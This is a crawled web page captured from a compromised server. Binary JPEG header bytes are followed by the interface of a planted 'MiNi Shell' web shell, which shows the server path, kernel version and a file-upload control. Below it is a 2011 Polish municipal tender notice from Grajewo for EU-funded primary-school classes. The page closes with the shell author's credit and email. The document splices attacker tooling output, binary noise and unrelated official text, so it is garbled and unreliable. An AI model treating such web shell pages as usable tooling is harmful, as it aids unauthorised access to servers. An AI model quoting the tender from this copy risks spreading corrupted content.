JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/42474-N-2011.html

<p class="kh_header"><b>Grajewo: Usługi edukacyjne, dotyczące prowadzenia zajęć dydaktycznych w ramach projektu systemowego nr WND-POKL.09.01.0-2-20-483/10  pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Grajewie</b><br>
<b>Numer ogłoszenia: 42474 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Grajewo , ul. Strażacka 6, 19-200 Grajewo, woj. podlaskie, tel. 086 2723235, faks 086 2723238.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.um.grajewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne, dotyczące prowadzenia zajęć dydaktycznych w ramach projektu systemowego nr WND-POKL.09.01.0-2-20-483/10  pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Grajewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na prowadzeniu zajęć dydaktycznych w ramach projektu nr WND-POKL.09.01.0-2-20-483/10 pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Grajewie.
Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć dydaktycznych w ramach ww projektu w kontekście wdrażania nowej podstawy kształcenia w szkołach podstawowych, dla których organem prowadzącym jest Miasto Grajewo. Projekt jest dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Poddziałanie 9.1.2.
Usługi będą realizowane w niżej wymienionych szkołach i specjalnościach.
Zamawiający dopuszcza możliwości składania ofert częściowych (na każdą część osobno) t.j. 28 części, z podziałem na następujące części:

1) Część nr 1. Zajęcia dydaktyczno wyrównawcze dla uczniów z ogólnymi trudnościami w nauce w Szkole Podstawowej nr 1 w Grajewie: 44 godzin, w 4 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej;

2) Część nr 2. Gimnastyka korekcyjna dla dzieci z wadami postawy w Szkole Podstawowej nr 1 w Grajewie grupy I-III: 33 godzin, w 3 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjno-kompensacyjnej;


3) Część nr 3. Gimnastyka korekcyjna dla dzieci z wadami postawy w Szkole Podstawowej nr 1 w Grajewie grupy IV-VI: 33 godzin, w 3 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjno-kompensacyjnej;

4) Część nr 4. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (matematyczno- przyrodnicze) w Szkole Podstawowej nr 1 w Grajewie: 22 godzin, w 2 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub prowadzenia zajęć matematycznych lub prowadzenia zajęć przyrodniczych;

5) Część nr 5. Zajęcia teatralne w Szkole Podstawowej nr 1 w Grajewie: 11 godzin, w 1 grupie, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub w zakresie pedagogiki opiekuńczo-wychowawczej;

6) Część nr 6. Zajęcia rewalidacyjne dla dzieci niepełnosprawnych w Szkole Podstawowej nr 1 w Grajewie: 22 godzin, w 2 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie oligofrenopedagogiki;

7) Część nr 7. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 1 w Grajewie: 55 godzin, w 5 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub terapii pedagogicznej;

8) Część nr 8. Gimnastyka korekcyjna dla dzieci z wadami postawy w Szkole Podstawowej nr 2 w Grajewie grupy I-V: 55 godzin, w 5 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjno-kompensacyjnej;

9) Część nr 9. Gimnastyka korekcyjna dla dzieci z wadami postawy w Szkole Podstawowej nr 2 w Grajewie grupy VI-X: 55 godzin, w 5 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjno-kompensacyjnej;

10) Część nr 10. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 2 w Grajewie grupy I-VI: 66 godzin, w 6 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć logopedycznych;

11) Część nr 11. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 2 w Grajewie grupy VII-XIII: 77 godzin, w 7 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć logopedycznych;

12) Część nr 12. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu, pisaniu oraz zagrożonych dysleksją w Szkole Podstawowej nr 2 w Grajewie: 33 godzin, w 3 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub terapii pedagogicznej;

13) Część nr 13. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (koło matematyczno-przyrodnicze) w Szkole Podstawowej nr 2 w Grajewie grupy I-V: 55 godzin, w 5 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć matematycznych lub do prowadzenia zajęć przyrodniczych;

14) Część nr 14. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (koło matematyczno-przyrodnicze) w Szkole Podstawowej nr 2 w Grajewie grupy VI-X: 55 godzin, w 5 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć matematycznych lub do prowadzenia zajęć przyrodniczych;

15) Część nr 15. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych humanistycznie w Szkole Podstawowej nr 2 w Grajewie: 33 godzin, w 3 grupach, po 11 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć z języka polskiego;

16) Część nr 16. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 4 w Grajewie grupy I-III: 54 godzin, w 3 grupach, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub terapii pedagogicznej;



17) Część nr 17. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 4 w Grajewie grupy IV-V: 36 godzin, w 2 grupach, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub terapii pedagogicznej;

18) Część nr 18. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej nr 4 w Grajewie grupy I-II: 36 godzin, w 2 grupach, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć matematycznych;

19) Część nr 19. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej nr 4 w Grajewie grupy III-IV: 36 godzin, w 2 grupach, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć matematycznych;

20) Część nr 20. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 4 w Grajewie: 36 godzin, w 4 grupach, po 9 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć logopedycznych;

21) Część nr 21. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej w Szkole Podstawowej nr 4 w Grajewie: 18 godzin, w 1 grupie, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie pedagogiki opiekuńczo-wychowawczej lub do prowadzenia zajęć socjoterapeutycznych;

22) Część nr 22. Gimnastyka korekcyjna dla dzieci z wadami postawy w Szkole Podstawowej nr 4 w Grajewie: 36 godzin, w 3 grupach, po 12 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjno-kompensacyjnej;

23) Część nr 23. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej nr 4 w Grajewie: 36 godzin, w 3 grupach, po 12 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć matematycznych lub do prowadzenia zajęć przyrodniczych;

24) Część nr 24. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie w Szkole Podstawowej nr 4 w Grajewie: 27 godzin, w 2 grupach, po 13,5 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć z plastyki lub do prowadzenia zajęć ze sztuki;

25) Część nr 25. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych muzycznie w Szkole Podstawowej nr 4 w Grajewie: 18 godzin, w 1 grupie, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub do prowadzenia zajęć z muzyki lub do prowadzenia zajęć ze sztuki;

26) Część nr 26. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych teatralnie i recytatorsko w Szkole Podstawowej nr 4 w Grajewie: 18 godzin, w 1 grupie, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub w zakresie pedagogiki opiekuńczo-wychowawczej;

27) Część nr 27. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych tanecznie w Szkole Podstawowej nr 4 w Grajewie: 30 godzin, w 1 grupie, po 30 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesno-szkolnej lub w zakresie pedagogiki opiekuńczo-wychowawczej lub uprawnienia instruktora tańca;

28) Część nr 28. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych językowo(język angielski) w Szkole Podstawowej nr 4 w Grajewie: 18 godzin, w 1 grupie, po 18 godzin na grupę; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje do nauczania języka angielskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, na podstawie art.67 ust.1 pkt.6 ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca zobowiązany jest wykazać posiadanie uprawnień pedagogicznych oraz kwalifikacji wymaganych do prowadzenia danego rodzaju zajęć, które zostały określone w rozdz. III ust.1 SIWZ w punktach od 1 do 28. Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do oferty - wg wzoru oferty załączonej do SIWZ załącznik nr 1 oraz załącznik nr2.
- Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia, potwierdzone wykonaniem, jako nauczyciel posiadający kwalifikacje do danego rodzaju prowadzonych zajęć, co najmniej rocznej usługi edukacyjnej w ostatnich 3 latach przed upływem terminu składania ofert. Wykonawca musi podać rodzaj, zakres (wyszczególnić gdzie wykonywano usługi np. szkoły, ośrodki kształcenia, itp.) data i miejsce wykonania usług. Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do oferty - wg  wzoru załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia w oparciu o wymagane dokumenty, których forma opisana jest w rozdz. V SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania stawiane przez Zamawiającego osobom by mogły być uznane za zdolne do wykonania zamówienia. Osoby muszą posiadać:
1. Przygotowanie pedagogiczne;
2. Kwalifikacje do nauczania danego rodzaju zajęć w poszczególnych szkołach podstawowych w klasach I-III, określone w rozdz. III ust.1 punkty od 1 do 28 SIWZ;
3. Co najmniej roczny staż pracy nauczyciela;
4. Pełną zdolność do czynności prawnych oraz korzystanie w pełni z praw publicznych.
Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli Wykonawca wykaże, że dysponuje osobą - osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia.
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia dołączonego przez Wykonawcę do oferty - wg  wzoru załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w zapisach umowy dotyczące terminów realizacji oraz wartości umowy w formie aneksu w przypadku zmian we wniosku aplikacyjnym oraz umowie o dofinansowanie projektu nr WND-POKL.09.01.0-2-20-483-10 pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Grajewie, które wprowadzi Instytucja Zarządzająca POKL, niemożliwych do przewidzenia na etapie opracowywania SIWZ, a które to będą wywoływały konieczność zmiany zapisów umowy. Zmiany te nie mogą powodować zwiększenia wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.grajewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Grajewo
ul. Strażacka 6a
19-200 Grajewo
pok. nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 12:00, miejsce: Urząd Miasta Grajewo
ul. Strażacka 6a
19-200 Grajewo
sekretariat, pok 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com